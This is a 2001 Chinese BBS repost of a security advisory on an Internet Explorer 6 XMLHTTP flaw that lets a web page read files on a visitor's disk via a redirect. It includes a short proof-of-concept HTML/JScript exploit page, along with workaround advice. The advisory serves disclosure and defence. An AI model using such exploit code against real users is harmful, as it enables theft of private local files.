荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: michaelx (==GuanShui=M.X), 信区: Security
标 题: Microsoft IE XMLHTTP文件泄露漏洞
发信站: 荔园晨风BBS站 (Sat Dec 22 11:30:14 2001), 转信
Microsoft IE XMLHTTP文件泄露漏洞
发布日期: 2001-12-15
更新日期: 2001-12-21
受影响的系统:
Microsoft Internet Explorer 6.0
- Microsoft Windows NT 4.0 SP6a
- Microsoft Windows NT
- Microsoft Windows ME
- Microsoft Windows 98
- Microsoft Windows 2000 SP2
- Microsoft Windows 2000 SP1
- Microsoft Windows 2000
不受影响系统:
描述:
----------------------------------------------------------------------------
----
BUGTRAQ ID: 3699
Microsoft Internet Explorer是和Windows系统捆绑的流行的Web浏览器。
与IE 6.0一起发布的XMLHTTP ActiveX控件存在漏洞,使攻击者可以获取浏览者本地主机
上的文件。
当IE的XMLHTTP控件响应一个文件重定向请求时,它会去处理请求所指向的文件而并不会
顾及URL协议。如果重定向指向的是本地文件系统里的文件,则文件的内容会暴露给调用
XMLHTTP控件的脚本。这样就会导致用户敏感信息的泄露。
<*来源:jelmer(jelmer@kuperus.xs4all.nl)
链接:http://www.xs4all.nl/~jkuperus/bug.htm
*>
测试程序:
----------------------------------------------------------------------------
----
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
jelmer(jelmer@kuperus.xs4all.nl)提供了如下的漏洞测试方法:
访问Web服务器上有如下代码的HTML页面:
<html>
<head>
<title>Exploit</title>
<script language="jscript">
function doIt() {
// open the file on the users harddisk using a http redirect
var xmlhttp = new ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jel
mer.txt", false);
xmlhttp.Send();
alert(xmlhttp.responseText);
}
</script>
</head>
<body>
<button onclick="doIt()">Do it</button>
</body>
</html>
则攻击者就可以访问到c:/jelmer.txt文件,如果攻击者知道其它的文件名,他一样也可
以访问到。
----------------------------------------------------------------------------
----
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 在IE中设置禁止活动脚本和ActiveX控件的执行。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主
页以获取最新版本:
http://www.microsoft.com/windows/ie/default.asp
--
M.X的FTP SERVER
ftp://192.168.55.18
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 203.93.19.1]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店